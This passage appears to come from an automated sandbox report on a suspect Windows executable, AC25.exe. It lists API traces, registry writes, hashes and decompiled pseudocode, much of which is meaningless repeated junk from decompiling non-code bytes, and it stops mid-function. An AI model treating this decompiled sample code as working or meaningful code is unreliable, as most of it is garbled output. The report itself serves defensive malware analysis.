NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000016.00000002.382004753.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: ccfb191151a767bdc9cbe4523c07d0d7ed4776b2de0f136642fab053b244c2bf
Instruction ID: a72ed57d07a02d256bd32122d7544ea4cc166053f19893fffcfb0d55415ced24
Opcode Fuzzy Hash: ccfb191151a767bdc9cbe4523c07d0d7ed4776b2de0f136642fab053b244c2bf
Instruction Fuzzy Hash: 0701A771608204EBDB01AF94DD92D6E3365AF41314F204177B943791E1C63D9E22EB6B

Uniqueness

Uniqueness Score: -1.00%

Function 0040199C, Relevance: 3.0, APIs: 2, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040199C(void* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t26;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t33;

				_t24 = __esi;
				_t22 = __edi;
				_t21 = __edx;
				_t33 = __edx - __ecx;
				asm("out dx, eax");
				_push(0x19bb);
				_t8 =  *_t28;
				_t29 = _t28 + 4;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t30 = _t29 + 4;
				E004012BF(_t8, __edx, __edi, __esi, _t33);
				_t16 =  *((intOrPtr*)(_t26 + 8));
				Sleep(0x1388);
				_push(_t26 - 4);
				_push( *((intOrPtr*)(_t26 + 0x10)));
				_push( *((intOrPtr*)(_t26 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t21, _t22, __esi, _t33); // executed
				_t34 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t26 + 0x14)));
					_push( *((intOrPtr*)(_t26 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t21, _t22, _t24, _t34); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t30;
				return E004012BF(_t13, _t21, _t22, _t24, _t34);
			}

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000016.00000002.382004753.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 4fb5e9a5afbf0bb0d8b1c466ddce95a75c30193c24937f166a7f97c6bea3c0da
Instruction ID: 38790f97698b8fbd236dc93497c28a5a48dbceb78932be0dbcbbb6d4f4f3ee68
Opcode Fuzzy Hash: 4fb5e9a5afbf0bb0d8b1c466ddce95a75c30193c24937f166a7f97c6bea3c0da
Instruction Fuzzy Hash: F1014471708204E7DB019A959D92E6A3365AB41710F204177BA43791E1C63E9A22EB5B

Uniqueness

Uniqueness Score: -1.00%

Function 004019A0, Relevance: 3.0, APIs: 2, Instructions: 43
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E004019A0(void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t20;
				void* _t25;
				void* _t27;
				intOrPtr* _t28;

				_t31 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("sbb ebx, ebp");
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t28 = _t27 + 4;
				E004012BF(_t8, _t20, __edi, __esi, __eflags);
				_t16 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t20, _t21, __esi, _t31); // executed
				_t32 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t20, _t21, _t23, _t32); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t28;
				return E004012BF(_t13, _t20, _t21, _t23, _t32);
			}

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000016.00000002.382004753.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: a3f083826976df0a3047c0ccb3ceba760f639657c05e2c9146095c379659a445
Instruction ID: 9c9c3dab28d51d6fb39e7a0de955185f52c78c5ab62663713faf9a931d33ce0c
Opcode Fuzzy Hash: a3f083826976df0a3047c0ccb3ceba760f639657c05e2c9146095c379659a445
Instruction Fuzzy Hash: 8EF08171308204E7DB01AF959D96EAE3725AF41310F20427BBA43791E1C63D8922EB27

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: AC25.exe PID: 6288 Parent PID: 3292 AC25.exeCOMMON

Executed Functions

Function 00401E00, Relevance: 37.6, APIs: 25, Instructions: 141registryCOMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401E55
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401E5D
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401E65
__vbaSetSystemError.MSVBVM60(?,00000000,?), ref: 00401E7B
__vbaStrToAnsi.MSVBVM60(?,?,?), ref: 00401E8F
RegCreateKeyA.ADVAPI32(?,00000000), ref: 00401E9B
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00401EA5
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401EAE
#537.MSVBVM60(00000000), ref: 00401EB5
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401EC0
__vbaLenBstr.MSVBVM60(?), ref: 00401ED3
__vbaStrMove.MSVBVM60(?,-00000001), ref: 00401EED
__vbaStrCat.MSVBVM60(00000000), ref: 00401EF4
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401EFF
__vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00401F0A
__vbaStrToAnsi.MSVBVM60(?,?,00000000,00000001,00000000), ref: 00401F18
RegSetValueExA.KERNELBASE(?,00000000), ref: 00401F24
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00401F2E
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00401F4A
RegCloseKey.KERNELBASE(?), ref: 00401F5C
__vbaSetSystemError.MSVBVM60(?), ref: 00401F67
__vbaFreeStr.MSVBVM60(00401FA6), ref: 00401F99
__vbaFreeStr.MSVBVM60 ref: 00401F9E
__vbaFreeStr.MSVBVM60 ref: 00401FA3
__vbaErrorOverflow.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401FB9

Memory Dump Source

Source File: 0000001A.00000002.392329179.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.391896707.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.392636917.0000000000404000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.392683542.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$AnsiCopyErrorMove$SystemUnicode$#537BstrCloseCreateListOverflowValue
String ID:
API String ID: 2107533140-0
Opcode ID: dd93c5477486cb4781e192d58d9aae3d067b3a656344793334b74da0dbd908eb
Instruction ID: fefd5eab8a53b1374428896d65942a4cb620eeccf9a984cdd28dd74a7c15a2cd
Opcode Fuzzy Hash: dd93c5477486cb4781e192d58d9aae3d067b3a656344793334b74da0dbd908eb
Instruction Fuzzy Hash: C351C6B5D10259AFCB04EFA4DD84CEEBBBDEF58704B10811AF501B3264DA74A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401C60, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401146), ref: 00401C7E
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401146), ref: 00401CAE
__vbaVarMove.MSVBVM60 ref: 00401CCF
__vbaVarCopy.MSVBVM60 ref: 00401CF0
__vbaVarCopy.MSVBVM60 ref: 00401D11
__vbaVarCopy.MSVBVM60 ref: 00401D32
__vbaStrVarVal.MSVBVM60(?,?), ref: 00401D47
__vbaStrVarVal.MSVBVM60(?,?,00000000), ref: 00401D56
__vbaStrVarVal.MSVBVM60(?,?,00000000), ref: 00401D65
__vbaI4Var.MSVBVM60(?,00000000), ref: 00401D70

Part of subcall function 00401E00: __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401E55
Part of subcall function 00401E00: __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401E5D
Part of subcall function 00401E00: __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401E65
Part of subcall function 00401E00: __vbaSetSystemError.MSVBVM60(?,00000000,?), ref: 00401E7B
Part of subcall function 00401E00: __vbaStrToAnsi.MSVBVM60(?,?,?), ref: 00401E8F
Part of subcall function 00401E00: RegCreateKeyA.ADVAPI32(?,00000000), ref: 00401E9B
Part of subcall function 00401E00: __vbaStrToUnicode.MSVBVM60(?,?), ref: 00401EA5
Part of subcall function 00401E00: __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401EAE
Part of subcall function 00401E00: #537.MSVBVM60(00000000), ref: 00401EB5
Part of subcall function 00401E00: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401EC0
Part of subcall function 00401E00: __vbaLenBstr.MSVBVM60(?), ref: 00401ED3
Part of subcall function 00401E00: __vbaStrMove.MSVBVM60(?,-00000001), ref: 00401EED
Part of subcall function 00401E00: __vbaStrCat.MSVBVM60(00000000), ref: 00401EF4
Part of subcall function 00401E00: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401EFF
Part of subcall function 00401E00: __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00401F0A
Part of subcall function 00401E00: __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000001,00000000), ref: 00401F18

__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000), ref: 00401D8A

Part of subcall function 00401FC0: __vbaVarLateMemSt.MSVBVM60(?,Enabled), ref: 0040209F
Part of subcall function 00401FC0: __vbaVarLateMemSt.MSVBVM60(?,Enabled), ref: 004020DA
Part of subcall function 00401FC0: __vbaVarLateMemSt.MSVBVM60(?,Enabled), ref: 00402118

__vbaFreeVar.MSVBVM60(00401DED,00000001), ref: 00401DCB
__vbaFreeVar.MSVBVM60 ref: 00401DD4
__vbaFreeVar.MSVBVM60 ref: 00401DDD
__vbaFreeVar.MSVBVM60 ref: 00401DE6

Strings

Software\Privacy Tools NL, xrefs: 00401CDC

Memory Dump Source

Source File: 0000001A.00000002.392329179.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.391896707.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.392636917.0000000000404000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.392683542.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CopyFree$Move$AnsiLate$Error$#537BstrChkstkCreateListSystemUnicode
String ID: Software\Privacy Tools NL
API String ID: 62378706-2008605987
Opcode ID: 5bb1a24821eb30742729a7ef069b9a4adc799a6ee054163fb1a27313da32d2cf
Instruction ID: 14ce0ff18d63f55136c18a18b80a11a0aee004dd7d5e421db8c20e4d00a0f790
Opcode Fuzzy Hash: 5bb1a24821eb30742729a7ef069b9a4adc799a6ee054163fb1a27313da32d2cf
Instruction Fuzzy Hash: AA41B3B1810249DBDB10DFE0CE58BDDBBB8BB04709F10862DE152B76A1DBB81649CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00401278, Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 25%

			_entry_() {
				signed char _t118;
				intOrPtr* _t119;
				intOrPtr* _t120;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t126;
				signed int _t127;
				signed char _t128;
				signed int _t129;
				signed char _t130;
				intOrPtr* _t131;
				signed int _t132;
				signed char _t133;
				intOrPtr* _t137;
				intOrPtr* _t139;
				signed char _t143;
				intOrPtr* _t146;
				intOrPtr* _t148;
				intOrPtr* _t150;
				intOrPtr* _t151;
				intOrPtr* _t152;
				intOrPtr* _t154;
				signed char _t155;
				signed int _t156;
				intOrPtr* _t157;
				signed int _t158;
				intOrPtr* _t160;
				intOrPtr* _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr* _t170;
				void* _t171;
				intOrPtr* _t172;
				void* _t173;
				intOrPtr* _t174;
				void* _t176;
				intOrPtr* _t177;
				signed int* _t179;
				signed int _t180;
				intOrPtr* _t181;
				intOrPtr* _t182;
				intOrPtr* _t184;
				intOrPtr* _t185;
				void* _t187;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed char _t191;
				intOrPtr* _t193;
				signed char _t194;
				signed int _t195;
				signed int* _t196;
				intOrPtr* _t197;
				void* _t198;
				void* _t199;
				signed int* _t200;
				signed int _t201;
				signed int _t202;
				void* _t204;
				signed int _t205;
				void* _t206;
				void* _t210;
				void* _t211;
				intOrPtr _t215;
				signed int _t224;
				signed int _t225;
				intOrPtr _t230;
				intOrPtr _t231;
				intOrPtr _t234;
				signed int _t239;
				signed int _t240;
				void* _t241;
				void* _t246;

				L00401272(); // executed
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *_t118 =  *_t118 ^ _t118;
				 *_t118 =  *_t118 + _t118;
				_t119 = _t118 + 1;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *_t119 =  *_t119 + _t119;
				 *((intOrPtr*)(_t199 + _t195 * 2 - 0x4b)) =  *((intOrPtr*)(_t199 + _t195 * 2 - 0x4b)) + _t187;
				_t200 = _t199 + 1;
				 *_t194 = _t195;
				_t204 = 0x40138c;
				_t205 = _t204 - 1;
				asm("wait");
				 *(_t187 + 0x55) =  *(_t187 + 0x55) << _t194;
				_t120 =  *((intOrPtr*)(_t197 - 0x19))(_t187);
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				_t215 =  *_t120;
				_push(_t195);
				_push(_t195);
				if(_t215 >= 0 && _t215 == 0) {
					 *[gs:eax] =  *[gs:eax] + _t120;
					 *_t120 =  *_t120 + _t120;
					 *_t120 =  *_t120 + _t120;
					 *_t120 =  *_t120 + _t120;
					 *_t120 =  *_t120 + _t120;
					 *_t197 =  *_t197 + _t120;
					 *_t120 =  *_t120 + _t120;
					 *_t120 =  *_t120 + _t195;
					asm("sbb [eax], eax");
					_pop(es);
					 *_t120 =  *_t120 + _t120;
					_t181 = _t120 + _t194;
					asm("sbb [eax], al");
					_pop(es);
					 *_t181 =  *_t181 + _t181;
					 *((intOrPtr*)(_t181 + 0x7004018)) =  *((intOrPtr*)(_t181 + 0x7004018)) + _t181;
					 *_t181 =  *_t181 + _t181;
					 *((intOrPtr*)(_t181 + _t187)) =  *((intOrPtr*)(_t181 + _t187)) + _t195;
					_t182 = _t181 + 1;
					 *_t197 =  *_t197 + _t182;
					 *_t182 =  *_t182 + _t182;
					_pop(ss);
					_t184 = _t182 + _t195 + 1;
					 *_t197 =  *_t197 + _t184;
					 *_t184 =  *_t184 + _t184;
					 *((intOrPtr*)(_t197 + _t195 + 0x70040)) =  *((intOrPtr*)(_t197 + _t195 + 0x70040)) + _t194;
					 *_t184 =  *_t184 + _t184;
					_pop(ss);
					_t185 = _t184 + 1;
					 *_t194 =  *_t194 + _t185;
					 *_t185 =  *_t185 + _t185;
					 *((intOrPtr*)(_t200 + _t195 + 0x40)) =  *((intOrPtr*)(_t200 + _t195 + 0x40)) + _t187;
					 *_t185 =  *_t185 + _t185;
					 *_t185 =  *_t185 + _t185;
					_t187 = _t187 + _t187;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					 *_t185 =  *_t185 + 1;
					 *_t185 =  *_t185 + _t185;
					 *((intOrPtr*)(_t185 + 0x8004016)) =  *((intOrPtr*)(_t185 + 0x8004016)) + _t195;
					_t120 = _t185 + 2;
					 *_t120 =  *_t120 + _t120;
					 *_t120 =  *_t120 + _t120;
					 *((intOrPtr*)(_t120 + 0x6d57d)) =  *((intOrPtr*)(_t120 + 0x6d57d)) + _t187;
					 *_t120 =  *_t120 + _t120;
					 *_t120 =  *_t120 + _t120;
					 *_t120 =  *_t120 + _t120;
				}
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				 *_t120 =  *_t120 + _t120;
				_t121 = _t120 + 1;
				 *_t194 =  *_t194 + _t121;
				 *_t194 =  *_t194 + _t121;
				 *((intOrPtr*)(_t200 + _t195 + 0x40)) =  *((intOrPtr*)(_t200 + _t195 + 0x40)) + _t187;
				 *_t121 =  *_t121 + _t121;
				 *_t121 =  *_t121 + _t121;
				_t188 = _t187 + _t187;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t121 =  *_t121 + 1;
				 *_t121 =  *_t121 + _t121;
				_t123 = _t121 + _t121 + 1;
				 *_t123 =  *_t123 + _t188;
				_t125 = _t123 + 2;
				 *_t197 =  *_t197 + _t125;
				 *_t125 =  *_t125 + _t125;
				 *((intOrPtr*)(_t125 + 0x13)) =  *((intOrPtr*)(_t125 + 0x13)) + _t195;
				_t126 = _t125 + 1;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *((intOrPtr*)(_t126 + 0x13)) =  *((intOrPtr*)(_t126 + 0x13)) + _t195;
				_t127 = _t126 + 1;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t188 =  *_t188 + _t127;
				 *_t205 =  *_t205 + _t195;
				if ( *_t205 >= 0) goto L4;
				 *[gs:edx] =  *[gs:edx] + _t195;
				if ( *[gs:edx] >= 0) goto L5;
				_t210 = ss;
				 *_t194 =  *_t194 + _t127;
				 *[fs:ebp] =  *[fs:ebp] + _t194;
				_push(_t200);
				_t196 = _t195 + 1;
				_t128 = _t127 ^ 0x2a1ff021;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t200 =  *_t200 + _t188;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				_t129 = _t128 |  *_t128;
				 *(_t129 + _t129) =  *(_t129 + _t129) | _t129;
				 *_t129 =  *_t129 + _t129;
				 *_t129 =  *_t129 + _t129;
				 *((intOrPtr*)(_t129 + 0x1c)) =  *((intOrPtr*)(_t129 + 0x1c)) + _t129;
				_t130 = _t129 + 1;
				 *_t130 =  *_t130 + _t130;
				asm("adc al, 0x40");
				 *_t130 =  *_t130 + _t130;
				asm("lock xor [eax], al");
				_t189 = _t188 + _t188;
				asm("invalid");
				 *_t130 =  *_t130 | _t130;
				 *_t130 =  *_t130 + _t130;
				 *_t130 =  *_t130 + _t130;
				 *_t130 =  *_t130 + _t130;
				 *_t130 =  *_t130 + _t130;
				 *_t130 =  *_t130 + _t130;
				goto 0xc84013d9;
				asm("adc al, [eax]");
				asm("enter 0x4012, 0x0");
				_t131 = _t130 + 1;
				 *_t131 =  *_t131 + _t189;
				 *_t131 =  *_t131 + _t131;
				if ( *_t131 > 0) goto L6;
				 *_t131 =  *_t131 + _t131;
				 *_t131 = _t131;
				 *_t131 =  *_t131 + _t131;
				_t132 =  *_t131;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				_push(_t132);
				if( *_t132 < 0) {
					L15:
					if (_t230 < 0) goto L16;
					_pop(_t211);
					 *_t194 =  *_t194 + _t132;
					 *_t132 =  *_t132 & _t132;
					_t210 = _t211 - 1;
					 *_t197 =  *_t197 + _t194;
					_t231 =  *_t197;
					if (_t231 == 0) goto L17;
					if (_t231 == 0) goto L18;
					asm("popad");
					L19:
					 *_t132 =  *_t132 + _t132;
					 *_t200 =  *_t200 + _t194;
					asm("outsd");
					 *_t196 = _t196 +  *_t196;
					 *_t132 = _t196 +  *_t132;
					 *_t197 =  *_t197 + _t196;
					L20:
					asm("aaa");
					 *0x36003800 =  *0x36003800 + _t196;
					 *_t197 =  *_t197 + _t196;
					 *_t196 = _t196 +  *_t196;
					 *_t132 = _t196 +  *_t132;
					 *((intOrPtr*)(_t132 + _t132 + 0x41)) =  *((intOrPtr*)(_t132 + _t132 + 0x41)) + _t189;
					 *_t132 =  *_t132 + _t132;
					 *((intOrPtr*)(_t132 + _t132 + 0x6f)) =  *((intOrPtr*)(_t132 + _t132 + 0x6f)) + _t194;
					 *((intOrPtr*)(_t132 + _t132 + 0x74)) =  *((intOrPtr*)(_t132 + _t132 + 0x74)) + _t196;
					 *_t194 =  *_t194 + _t132;
					 *_t132 =  *_t132 & _t132;
					_t201 = _t200 - 1;
					 *_t197 =  *_t197 + _t194;
					_t133 = _t132 ^  *_t132;
					 *_t133 =  *_t133 ^ _t133;
					asm("aaa");
					 *0x36003800 =  *0x36003800 + _t196;
					 *_t197 =  *_t197 + _t196;
					 *_t196 = _t196 +  *_t196;
					 *_t133 = _t196 +  *_t133;
					 *_t133 = _t196 +  *_t133;
					 *_t194 = _t196 +  *_t194;
					 *_t133 =  *_t133 + _t133;
					 *_t133 = _t196 +  *_t133;
					 *_t133 =  *_t133 & _t133;
					_t137 = _t133 + 0x122;
					 *_t196 = _t196 +  *_t196;
					 *((intOrPtr*)(_t137 + _t137 + 0x65)) =  *((intOrPtr*)(_t137 + _t137 + 0x65)) + _t196;
					 *_t137 =  *_t137 + _t189;
					_t234 =  *_t137;
					if (_t234 == 0) goto L21;
					if (_t234 != 0) goto L22;
					if (_t234 < 0) goto L23;
					 *[gs:esi] =  *[gs:esi] + _t194;
					 *_t201 =  *_t201 + _t196;
					asm("bound eax, [eax]");
					if ( *_t201 < 0) goto L24;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
					 *_t137 =  *_t137 + _t137;
